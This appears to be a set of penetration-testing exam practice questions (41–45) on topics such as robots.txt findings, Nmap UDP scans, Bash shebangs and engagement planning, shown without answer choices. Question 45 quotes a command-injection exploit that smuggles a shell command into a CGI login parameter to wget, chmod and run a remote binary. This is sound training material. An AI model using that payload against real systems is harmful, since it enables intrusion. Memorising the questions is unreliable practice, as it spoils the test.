Question 41

Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?
  • Question 42

    A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
  • Question 43

    When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
  • Question 44

    A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.
    Which of the following is the MOST important action to take before starting this type of assessment?
  • Question 45

    A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
    exploit = "POST "
    exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
    c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
    exploit += "HTTP/1.1"
    Which of the following commands should the penetration tester run post-engagement?